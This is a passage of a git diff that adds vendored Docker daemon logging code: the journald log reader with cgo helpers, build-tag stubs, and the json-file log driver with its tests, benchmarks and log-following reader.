/dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read.go @@ -0,0 +1,401 @@ +// +build linux,cgo,!static_build,journald + +package journald + +// #include +// #include +// #include +// #include +// #include +// #include +// #include +// #include +// #include +// +//static int get_message(sd_journal *j, const char **msg, size_t *length, int *partial) +//{ +// int rc; +// size_t plength; +// *msg = NULL; +// *length = 0; +// plength = strlen("CONTAINER_PARTIAL_MESSAGE=true"); +// rc = sd_journal_get_data(j, "CONTAINER_PARTIAL_MESSAGE", (const void **) msg, length); +// *partial = ((rc == 0) && (*length == plength) && (memcmp(*msg, "CONTAINER_PARTIAL_MESSAGE=true", plength) == 0)); +// rc = sd_journal_get_data(j, "MESSAGE", (const void **) msg, length); +// if (rc == 0) { +// if (*length > 8) { +// (*msg) += 8; +// *length -= 8; +// } else { +// *msg = NULL; +// *length = 0; +// rc = -ENOENT; +// } +// } +// return rc; +//} +//static int get_priority(sd_journal *j, int *priority) +//{ +// const void *data; +// size_t i, length; +// int rc; +// *priority = -1; +// rc = sd_journal_get_data(j, "PRIORITY", &data, &length); +// if (rc == 0) { +// if ((length > 9) && (strncmp(data, "PRIORITY=", 9) == 0)) { +// *priority = 0; +// for (i = 9; i < length; i++) { +// *priority = *priority * 10 + ((const char *)data)[i] - '0'; +// } +// if (length > 9) { +// rc = 0; +// } +// } +// } +// return rc; +//} +//static int is_attribute_field(const char *msg, size_t length) +//{ +// static const struct known_field { +// const char *name; +// size_t length; +// } fields[] = { +// {"MESSAGE", sizeof("MESSAGE") - 1}, +// {"MESSAGE_ID", sizeof("MESSAGE_ID") - 1}, +// {"PRIORITY", sizeof("PRIORITY") - 1}, +// {"CODE_FILE", sizeof("CODE_FILE") - 1}, +// {"CODE_LINE", sizeof("CODE_LINE") - 1}, +// {"CODE_FUNC", sizeof("CODE_FUNC") - 1}, +// {"ERRNO", sizeof("ERRNO") - 1}, +// {"SYSLOG_FACILITY", sizeof("SYSLOG_FACILITY") - 1}, +// {"SYSLOG_IDENTIFIER", sizeof("SYSLOG_IDENTIFIER") - 1}, +// {"SYSLOG_PID", sizeof("SYSLOG_PID") - 1}, +// {"CONTAINER_NAME", sizeof("CONTAINER_NAME") - 1}, +// {"CONTAINER_ID", sizeof("CONTAINER_ID") - 1}, +// {"CONTAINER_ID_FULL", sizeof("CONTAINER_ID_FULL") - 1}, +// {"CONTAINER_TAG", sizeof("CONTAINER_TAG") - 1}, +// }; +// unsigned int i; +// void *p; +// if ((length < 1) || (msg[0] == '_') || ((p = memchr(msg, '=', length)) == NULL)) { +// return -1; +// } +// length = ((const char *) p) - msg; +// for (i = 0; i < sizeof(fields) / sizeof(fields[0]); i++) { +// if ((fields[i].length == length) && (memcmp(fields[i].name, msg, length) == 0)) { +// return -1; +// } +// } +// return 0; +//} +//static int get_attribute_field(sd_journal *j, const char **msg, size_t *length) +//{ +// int rc; +// *msg = NULL; +// *length = 0; +// while ((rc = sd_journal_enumerate_data(j, (const void **) msg, length)) > 0) { +// if (is_attribute_field(*msg, *length) == 0) { +// break; +// } +// rc = -ENOENT; +// } +// return rc; +//} +//static int wait_for_data_cancelable(sd_journal *j, int pipefd) +//{ +// struct pollfd fds[2]; +// uint64_t when = 0; +// int timeout, jevents, i; +// struct timespec ts; +// uint64_t now; +// +// memset(&fds, 0, sizeof(fds)); +// fds[0].fd = pipefd; +// fds[0].events = POLLHUP; +// fds[1].fd = sd_journal_get_fd(j); +// if (fds[1].fd < 0) { +// return fds[1].fd; +// } +// +// do { +// jevents = sd_journal_get_events(j); +// if (jevents < 0) { +// return jevents; +// } +// fds[1].events = jevents; +// sd_journal_get_timeout(j, &when); +// if (when == -1) { +// timeout = -1; +// } else { +// clock_gettime(CLOCK_MONOTONIC, &ts); +// now = (uint64_t) ts.tv_sec * 1000000 + ts.tv_nsec / 1000; +// timeout = when > now ? (int) ((when - now + 999) / 1000) : 0; +// } +// i = poll(fds, 2, timeout); +// if ((i == -1) && (errno != EINTR)) { +// /* An unexpected error. */ +// return (errno != 0) ? -errno : -EINTR; +// } +// if (fds[0].revents & POLLHUP) { +// /* The close notification pipe was closed. */ +// return 0; +// } +// if (sd_journal_process(j) == SD_JOURNAL_APPEND) { +// /* Data, which we might care about, was appended. */ +// return 1; +// } +// } while ((fds[0].revents & POLLHUP) == 0); +// return 0; +//} +import "C" + +import ( + "fmt" + "strings" + "time" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/coreos/go-systemd/journal" + "github.com/docker/docker/daemon/logger" +) + +func (s *journald) Close() error { + s.readers.mu.Lock() + for reader := range s.readers.readers { + reader.Close() + } + s.readers.mu.Unlock() + return nil +} + +func (s *journald) drainJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, oldCursor *C.char) *C.char { + var msg, data, cursor *C.char + var length C.size_t + var stamp C.uint64_t + var priority, partial C.int + + // Walk the journal from here forward until we run out of new entries. +drain: + for { + // Try not to send a given entry twice. + if oldCursor != nil { + for C.sd_journal_test_cursor(j, oldCursor) > 0 { + if C.sd_journal_next(j) <= 0 { + break drain + } + } + } + // Read and send the logged message, if there is one to read. + i := C.get_message(j, &msg, &length, &partial) + if i != -C.ENOENT && i != -C.EADDRNOTAVAIL { + // Read the entry's timestamp. + if C.sd_journal_get_realtime_usec(j, &stamp) != 0 { + break + } + // Set up the time and text of the entry. + timestamp := time.Unix(int64(stamp)/1000000, (int64(stamp)%1000000)*1000) + line := C.GoBytes(unsafe.Pointer(msg), C.int(length)) + if partial == 0 { + line = append(line, "\n"...) + } + // Recover the stream name by mapping + // from the journal priority back to + // the stream that we would have + // assigned that value. + source := "" + if C.get_priority(j, &priority) != 0 { + source = "" + } else if priority == C.int(journal.PriErr) { + source = "stderr" + } else if priority == C.int(journal.PriInfo) { + source = "stdout" + } + // Retrieve the values of any variables we're adding to the journal. + attrs := make(map[string]string) + C.sd_journal_restart_data(j) + for C.get_attribute_field(j, &data, &length) > C.int(0) { + kv := strings.SplitN(C.GoStringN(data, C.int(length)), "=", 2) + attrs[kv[0]] = kv[1] + } + if len(attrs) == 0 { + attrs = nil + } + // Send the log message. + logWatcher.Msg <- &logger.Message{ + Line: line, + Source: source, + Timestamp: timestamp.In(time.UTC), + Attrs: attrs, + } + } + // If we're at the end of the journal, we're done (for now). + if C.sd_journal_next(j) <= 0 { + break + } + } + + // free(NULL) is safe + C.free(unsafe.Pointer(oldCursor)) + C.sd_journal_get_cursor(j, &cursor) + return cursor +} + +func (s *journald) followJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, pfd [2]C.int, cursor *C.char) *C.char { + s.readers.mu.Lock() + s.readers.readers[logWatcher] = logWatcher + s.readers.mu.Unlock() + go func() { + // Keep copying journal data out until we're notified to stop + // or we hit an error. + status := C.wait_for_data_cancelable(j, pfd[0]) + for status == 1 { + cursor = s.drainJournal(logWatcher, config, j, cursor) + status = C.wait_for_data_cancelable(j, pfd[0]) + } + if status < 0 { + cerrstr := C.strerror(C.int(-status)) + errstr := C.GoString(cerrstr) + fmtstr := "error %q while attempting to follow journal for container %q" + logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"]) + } + // Clean up. + C.close(pfd[0]) + s.readers.mu.Lock() + delete(s.readers.readers, logWatcher) + s.readers.mu.Unlock() + C.sd_journal_close(j) + close(logWatcher.Msg) + }() + // Wait until we're told to stop. + select { + case <-logWatcher.WatchClose(): + // Notify the other goroutine that its work is done. + C.close(pfd[1]) + } + + return cursor +} + +func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) { + var j *C.sd_journal + var cmatch, cursor *C.char + var stamp C.uint64_t + var sinceUnixMicro uint64 + var pipes [2]C.int + + // Get a handle to the journal. + rc := C.sd_journal_open(&j, C.int(0)) + if rc != 0 { + logWatcher.Err <- fmt.Errorf("error opening journal") + close(logWatcher.Msg) + return + } + // If we end up following the log, we can set the journal context + // pointer and the channel pointer to nil so that we won't close them + // here, potentially while the goroutine that uses them is still + // running. Otherwise, close them when we return from this function. + following := false + defer func(pfollowing *bool) { + if !*pfollowing { + C.sd_journal_close(j) + close(logWatcher.Msg) + } + }(&following) + // Remove limits on the size of data items that we'll retrieve. + rc = C.sd_journal_set_data_threshold(j, C.size_t(0)) + if rc != 0 { + logWatcher.Err <- fmt.Errorf("error setting journal data threshold") + return + } + // Add a match to have the library do the searching for us. + cmatch = C.CString("CONTAINER_ID_FULL=" + s.vars["CONTAINER_ID_FULL"]) + defer C.free(unsafe.Pointer(cmatch)) + rc = C.sd_journal_add_match(j, unsafe.Pointer(cmatch), C.strlen(cmatch)) + if rc != 0 { + logWatcher.Err <- fmt.Errorf("error setting journal match") + return + } + // If we have a cutoff time, convert it to Unix time once. + if !config.Since.IsZero() { + nano := config.Since.UnixNano() + sinceUnixMicro = uint64(nano / 1000) + } + if config.Tail > 0 { + lines := config.Tail + // Start at the end of the journal. + if C.sd_journal_seek_tail(j) < 0 { + logWatcher.Err <- fmt.Errorf("error seeking to end of journal") + return + } + if C.sd_journal_previous(j) < 0 { + logWatcher.Err <- fmt.Errorf("error backtracking to previous journal entry") + return + } + // Walk backward. + for lines > 0 { + // Stop if the entry time is before our cutoff. + // We'll need the entry time if it isn't, so go + // ahead and parse it now. + if C.sd_journal_get_realtime_usec(j, &stamp) != 0 { + break + } else { + // Compare the timestamp on the entry + // to our threshold value. + if sinceUnixMicro != 0 && sinceUnixMicro > uint64(stamp) { + break + } + } + lines-- + // If we're at the start of the journal, or + // don't need to back up past any more entries, + // stop. + if lines == 0 || C.sd_journal_previous(j) <= 0 { + break + } + } + } else { + // Start at the beginning of the journal. + if C.sd_journal_seek_head(j) < 0 { + logWatcher.Err <- fmt.Errorf("error seeking to start of journal") + return + } + // If we have a cutoff date, fast-forward to it. + if sinceUnixMicro != 0 && C.sd_journal_seek_realtime_usec(j, C.uint64_t(sinceUnixMicro)) != 0 { + logWatcher.Err <- fmt.Errorf("error seeking to start time in journal") + return + } + if C.sd_journal_next(j) < 0 { + logWatcher.Err <- fmt.Errorf("error skipping to next journal entry") + return + } + } + cursor = s.drainJournal(logWatcher, config, j, nil) + if config.Follow { + // Allocate a descriptor for following the journal, if we'll + // need one. Do it here so that we can report if it fails. + if fd := C.sd_journal_get_fd(j); fd < C.int(0) { + logWatcher.Err <- fmt.Errorf("error opening journald follow descriptor: %q", C.GoString(C.strerror(-fd))) + } else { + // Create a pipe that we can poll at the same time as + // the journald descriptor. + if C.pipe(&pipes[0]) == C.int(-1) { + logWatcher.Err <- fmt.Errorf("error opening journald close notification pipe") + } else { + cursor = s.followJournal(logWatcher, config, j, pipes, cursor) + // Let followJournal handle freeing the journal context + // object and closing the channel. + following = true + } + } + } + + C.free(unsafe.Pointer(cursor)) + return +} + +func (s *journald) ReadLogs(config logger.ReadConfig) *logger.LogWatcher { + logWatcher := logger.NewLogWatcher() + go s.readLogs(logWatcher, config) + return logWatcher +} diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go new file mode 100644 index 0000000000..bba6de55be --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go @@ -0,0 +1,6 @@ +// +build linux,cgo,!static_build,journald,!journald_compat + +package journald + +// #cgo pkg-config: libsystemd +import "C" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go new file mode 100644 index 0000000000..3f7a43c59e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go @@ -0,0 +1,6 @@ +// +build linux,cgo,!static_build,journald,journald_compat + +package journald + +// #cgo pkg-config: libsystemd-journal +import "C" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go new file mode 100644 index 0000000000..b43abdcaf7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux !cgo static_build !journald + +package journald + +func (s *journald) Close() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go new file mode 100644 index 0000000000..a429a08a4f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go @@ -0,0 +1,151 @@ +// Package jsonfilelog provides the default Logger implementation for +// Docker logging. This logger logs to files on the host server in the +// JSON format. +package jsonfilelog + +import ( + "bytes" + "encoding/json" + "fmt" + "strconv" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/go-units" +) + +// Name is the name of the file that the jsonlogger logs to. +const Name = "json-file" + +// JSONFileLogger is Logger implementation for default Docker logging. +type JSONFileLogger struct { + buf *bytes.Buffer + writer *loggerutils.RotateFileWriter + mu sync.Mutex + readers map[*logger.LogWatcher]struct{} // stores the active log followers + extra []byte // json-encoded extra attributes +} + +func init() { + if err := logger.RegisterLogDriver(Name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(Name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates new JSONFileLogger which writes to filename passed in +// on given context. +func New(ctx logger.Context) (logger.Logger, error) { + var capval int64 = -1 + if capacity, ok := ctx.Config["max-size"]; ok { + var err error + capval, err = units.FromHumanSize(capacity) + if err != nil { + return nil, err + } + } + var maxFiles = 1 + if maxFileString, ok := ctx.Config["max-file"]; ok { + var err error + maxFiles, err = strconv.Atoi(maxFileString) + if err != nil { + return nil, err + } + if maxFiles < 1 { + return nil, fmt.Errorf("max-file cannot be less than 1") + } + } + + writer, err := loggerutils.NewRotateFileWriter(ctx.LogPath, capval, maxFiles) + if err != nil { + return nil, err + } + + var extra []byte + if attrs := ctx.ExtraAttributes(nil); len(attrs) > 0 { + var err error + extra, err = json.Marshal(attrs) + if err != nil { + return nil, err + } + } + + return &JSONFileLogger{ + buf: bytes.NewBuffer(nil), + writer: writer, + readers: make(map[*logger.LogWatcher]struct{}), + extra: extra, + }, nil +} + +// Log converts logger.Message to jsonlog.JSONLog and serializes it to file. +func (l *JSONFileLogger) Log(msg *logger.Message) error { + timestamp, err := jsonlog.FastTimeMarshalJSON(msg.Timestamp) + if err != nil { + return err + } + l.mu.Lock() + logline := msg.Line + if !msg.Partial { + logline = append(msg.Line, '\n') + } + err = (&jsonlog.JSONLogs{ + Log: logline, + Stream: msg.Source, + Created: timestamp, + RawAttrs: l.extra, + }).MarshalJSONBuf(l.buf) + if err != nil { + l.mu.Unlock() + return err + } + + l.buf.WriteByte('\n') + _, err = l.writer.Write(l.buf.Bytes()) + l.buf.Reset() + l.mu.Unlock() + + return err +} + +// ValidateLogOpt looks for json specific log options max-file & max-size. +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "max-file": + case "max-size": + case "labels": + case "env": + default: + return fmt.Errorf("unknown log opt '%s' for json-file log driver", key) + } + } + return nil +} + +// LogPath returns the location the given json logger logs to. +func (l *JSONFileLogger) LogPath() string { + return l.writer.LogPath() +} + +// Close closes underlying file and signals all readers to stop. +func (l *JSONFileLogger) Close() error { + l.mu.Lock() + err := l.writer.Close() + for r := range l.readers { + r.Close() + delete(l.readers, r) + } + l.mu.Unlock() + return err +} + +// Name returns name of this logger. +func (l *JSONFileLogger) Name() string { + return Name +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go new file mode 100644 index 0000000000..b5b818a8ba --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go @@ -0,0 +1,248 @@ +package jsonfilelog + +import ( + "encoding/json" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "strconv" + "testing" + "time" + + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/pkg/jsonlog" +) + +func TestJSONFileLogger(t *testing.T) { + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + tmp, err := ioutil.TempDir("", "docker-logger-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + filename := filepath.Join(tmp, "container.log") + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filename, + }) + if err != nil { + t.Fatal(err) + } + defer l.Close() + + if err := l.Log(&logger.Message{Line: []byte("line1"), Source: "src1"}); err != nil { + t.Fatal(err) + } + if err := l.Log(&logger.Message{Line: []byte("line2"), Source: "src2"}); err != nil { + t.Fatal(err) + } + if err := l.Log(&logger.Message{Line: []byte("line3"), Source: "src3"}); err != nil { + t.Fatal(err) + } + res, err := ioutil.ReadFile(filename) + if err != nil { + t.Fatal(err) + } + expected := `{"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line2\n","stream":"src2","time":"0001-01-01T00:00:00Z"} +{"log":"line3\n","stream":"src3","time":"0001-01-01T00:00:00Z"} +` + + if string(res) != expected { + t.Fatalf("Wrong log content: %q, expected %q", res, expected) + } +} + +func BenchmarkJSONFileLogger(b *testing.B) { + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + tmp, err := ioutil.TempDir("", "docker-logger-") + if err != nil { + b.Fatal(err) + } + defer os.RemoveAll(tmp) + filename := filepath.Join(tmp, "container.log") + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filename, + }) + if err != nil { + b.Fatal(err) + } + defer l.Close() + + testLine := "Line that thinks that it is log line from docker\n" + msg := &logger.Message{Line: []byte(testLine), Source: "stderr", Timestamp: time.Now().UTC()} + jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON() + if err != nil { + b.Fatal(err) + } + b.SetBytes(int64(len(jsonlog)+1) * 30) + b.ResetTimer() + for i := 0; i < b.N; i++ { + for j := 0; j < 30; j++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } + } +} + +func TestJSONFileLoggerWithOpts(t *testing.T) { + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + tmp, err := ioutil.TempDir("", "docker-logger-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + filename := filepath.Join(tmp, "container.log") + config := map[string]string{"max-file": "2", "max-size": "1k"} + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filename, + Config: config, + }) + if err != nil { + t.Fatal(err) + } + defer l.Close() + for i := 0; i < 20; i++ { + if err := l.Log(&logger.Message{Line: []byte("line" + strconv.Itoa(i)), Source: "src1"}); err != nil { + t.Fatal(err) + } + } + res, err := ioutil.ReadFile(filename) + if err != nil { + t.Fatal(err) + } + penUlt, err := ioutil.ReadFile(filename + ".1") + if err != nil { + t.Fatal(err) + } + + expectedPenultimate := `{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line2\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line3\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line4\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line5\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line6\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line7\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line8\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line9\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line10\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line11\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line12\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line13\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line14\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line15\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +` + expected := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line17\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line18\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line19\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +` + + if string(res) != expected { + t.Fatalf("Wrong log content: %q, expected %q", res, expected) + } + if string(penUlt) != expectedPenultimate { + t.Fatalf("Wrong log content: %q, expected %q", penUlt, expectedPenultimate) + } + +} + +func TestJSONFileLoggerWithLabelsEnv(t *testing.T) { + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + tmp, err := ioutil.TempDir("", "docker-logger-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + filename := filepath.Join(tmp, "container.log") + config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl"} + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filename, + Config: config, + ContainerLabels: map[string]string{"rack": "101", "dc": "lhr"}, + ContainerEnv: []string{"environ=production", "debug=false", "port=10001", "ssl=true"}, + }) + if err != nil { + t.Fatal(err) + } + defer l.Close() + if err := l.Log(&logger.Message{Line: []byte("line"), Source: "src1"}); err != nil { + t.Fatal(err) + } + res, err := ioutil.ReadFile(filename) + if err != nil { + t.Fatal(err) + } + + var jsonLog jsonlog.JSONLogs + if err := json.Unmarshal(res, &jsonLog); err != nil { + t.Fatal(err) + } + extra := make(map[string]string) + if err := json.Unmarshal(jsonLog.RawAttrs, &extra); err != nil { + t.Fatal(err) + } + expected := map[string]string{ + "rack": "101", + "dc": "lhr", + "environ": "production", + "debug": "false", + "ssl": "true", + } + if !reflect.DeepEqual(extra, expected) { + t.Fatalf("Wrong log attrs: %q, expected %q", extra, expected) + } +} + +func BenchmarkJSONFileLoggerWithReader(b *testing.B) { + b.StopTimer() + b.ResetTimer() + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + dir, err := ioutil.TempDir("", "json-logger-bench") + if err != nil { + b.Fatal(err) + } + defer os.RemoveAll(dir) + + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filepath.Join(dir, "container.log"), + }) + if err != nil { + b.Fatal(err) + } + defer l.Close() + msg := &logger.Message{Line: []byte("line"), Source: "src1"} + jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON() + if err != nil { + b.Fatal(err) + } + b.SetBytes(int64(len(jsonlog)+1) * 30) + + b.StartTimer() + + go func() { + for i := 0; i < b.N; i++ { + for j := 0; j < 30; j++ { + l.Log(msg) + } + } + l.Close() + }() + + lw := l.(logger.LogReader).ReadLogs(logger.ReadConfig{Follow: true}) + watchClose := lw.WatchClose() + for { + select { + case <-lw.Msg: + case <-watchClose: + return + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go new file mode 100644 index 0000000000..f2f9df1887 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go @@ -0,0 +1,319 @@ +package jsonfilelog + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io" + "os" + "time" + + "github.com/fsnotify/fsnotify" + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/pkg/filenotify" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/pkg/tailfile" +) + +const maxJSONDecodeRetry = 20000 + +func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) { + l.Reset() + if err := dec.Decode(l); err != nil { + return nil, err + } + msg := &logger.Message{ + Source: l.Stream, + Timestamp: l.Created, + Line: []byte(l.Log), + Attrs: l.Attrs, + } + return msg, nil +} + +// ReadLogs implements the logger's LogReader interface for the logs +// created by this driver. +func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher { + logWatcher := logger.NewLogWatcher() + + go l.readLogs(logWatcher, config) + return logWatcher +} + +func (l *JSONFileLogger) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) { + defer close(logWatcher.Msg) + + // lock so the read stream doesn't get corrupted due to rotations or other log data written while we read + // This will block writes!!! + l.mu.Lock() + + pth := l.writer.LogPath() + var files []io.ReadSeeker + for i := l.writer.MaxFiles(); i > 1; i-- { + f, err := os.Open(fmt.Sprintf("%s.%d", pth, i-1)) + if err != nil { + if !os.IsNotExist(err) { + logWatcher.Err <- err + break + } + continue + } + defer f.Close() + + files = append(files, f) + } + + latestFile, err := os.Open(pth) + if err != nil { + logWatcher.Err <- err + l.mu.Unlock() + return + } + defer latestFile.Close() + + if config.Tail != 0 { + tailer := ioutils.MultiReadSeeker(append(files, latestFile)...) + tailFile(tailer, logWatcher, config.Tail, config.Since) + } + + // close all the rotated files + for _, f := range files { + if err := f.(io.Closer).Close(); err != nil { + logrus.WithField("logger", "json-file").Warnf("error closing tailed log file: %v", err) + } + } + + if !config.Follow { + if err := latestFile.Close(); err != nil { + logrus.Errorf("Error closing file: %v", err) + } + l.mu.Unlock() + return + } + + if config.Tail >= 0 { + latestFile.Seek(0, os.SEEK_END) + } + + l.readers[logWatcher] = struct{}{} + l.mu.Unlock() + + notifyRotate := l.writer.NotifyRotate() + followLogs(latestFile, logWatcher, notifyRotate, config.Since) + + l.mu.Lock() + delete(l.readers, logWatcher) + l.mu.Unlock() + + l.writer.NotifyRotateEvict(notifyRotate) +} + +func tailFile(f io.ReadSeeker, logWatcher *logger.LogWatcher, tail int, since time.Time) { + var rdr io.Reader + rdr = f + if tail > 0 { + ls, err := tailfile.TailFile(f, tail) + if err != nil { + logWatcher.Err <- err + return + } + rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n"))) + } + dec := json.NewDecoder(rdr) + l := &jsonlog.JSONLog{} + for { + msg, err := decodeLogLine(dec, l) + if err != nil { + if err != io.EOF { + logWatcher.Err <- err + } + return + } + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + logWatcher.Msg <- msg + } +} + +func watchFile(name string) (filenotify.FileWatcher, error) { + fileWatcher, err := filenotify.New() + if err != nil { + return nil, err + } + + if err := fileWatcher.Add(name); err != nil { + logrus.WithField("logger", "json-file").Warnf("falling back to file poller due to error: %v", err) + fileWatcher.Close() + fileWatcher = filenotify.NewPollingWatcher() + + if err := fileWatcher.Add(name); err != nil { + fileWatcher.Close() + logrus.Debugf("error watching log file for modifications: %v", err) + return nil, err + } + } + return fileWatcher, nil +} + +func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, since time.Time) { + dec := json.NewDecoder(f) + l := &jsonlog.JSONLog{} + + name := f.Name() + fileWatcher, err := watchFile(name) + if err != nil { + logWatcher.Err <- err + return + } + defer func() { + f.Close() + fileWatcher.Remove(name) + fileWatcher.Close() + }() + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go func() { + select { + case <-logWatcher.WatchClose(): + fileWatcher.Remove(name) + cancel() + case <-ctx.Done(): + return + } + }() + + var retries int + handleRotate := func() error { + f.Close() + fileWatcher.Remove(name) + + // retry when the file doesn't exist + for retries := 0; retries <= 5; retries++ { + f, err = os.Open(name) + if err == nil || !os.IsNotExist(err) { + break + } + } + if err != nil { + return err + } + if err := fileWatcher.Add(name); err != nil { + return err + } + dec = json.NewDecoder(f) + return nil + } + + errRetry := errors.New("retry") + errDone := errors.New("done") + waitRead := func() error { + select { + case e := <-fileWatcher.Events(): + switch e.Op { + case fsnotify.Write: + dec = json.NewDecoder(f) + return nil + case fsnotify.Rename, fsnotify.Remove: + select { + case <-notifyRotate: + case <-ctx.Done(): + return errDone + } + if err := handleRotate(); err != nil { + return err + } + return nil + } + return errRetry + case err := <-fileWatcher.Errors(): + logrus.Debug("logger got error watching file: %v", err) + // Something happened, let's try and stay alive and create a new watcher + if retries <= 5 { + fileWatcher.Close() + fileWatcher, err = watchFile(name) + if err != nil { + return err + } + retries++ + return errRetry + } + return err + case <-ctx.Done(): + return errDone + } + } + + handleDecodeErr := func(err error) error { + if err == io.EOF { + for err := waitRead(); err != nil; { + if err == errRetry { + // retry the waitRead + continue + } + return err + } + return nil + } + // try again because this shouldn't happen + if _, ok := err.(*json.SyntaxError); ok && retries <= maxJSONDecodeRetry { + dec = json.NewDecoder(f) + retries++ + return nil + } + // io.ErrUnexpectedEOF is returned from json.Decoder when there is + // remaining data in the parser's buffer while an io.EOF occurs. + // If the json logger writes a partial json log entry to the disk + // while at the same time the decoder tries to decode it, the race condition happens. + if err == io.ErrUnexpectedEOF && retries <= maxJSONDecodeRetry { + reader := io.MultiReader(dec.Buffered(), f) + dec = json.NewDecoder(reader) + retries++ + return nil + } + return err + } + + // main loop + for { + msg, err := decodeLogLine(dec, l) + if err != nil { + if err := handleDecodeErr(err); err != nil { + if err == errDone { + return + } + // we got an unrecoverable error, so return + logWatcher.Err <- err + return + } + // ready to try again + continue + } + + retries = 0 // reset retries since we've succeeded + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + select { + case logWatcher.Msg <- msg: + case <-ctx.Done(): + logWatcher.Msg <- msg + for { + msg, err := decodeLogLine(dec, l) + if err != nil { + return + } + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + logWatcher.Msg <- msg + } + } + } +} diff --git 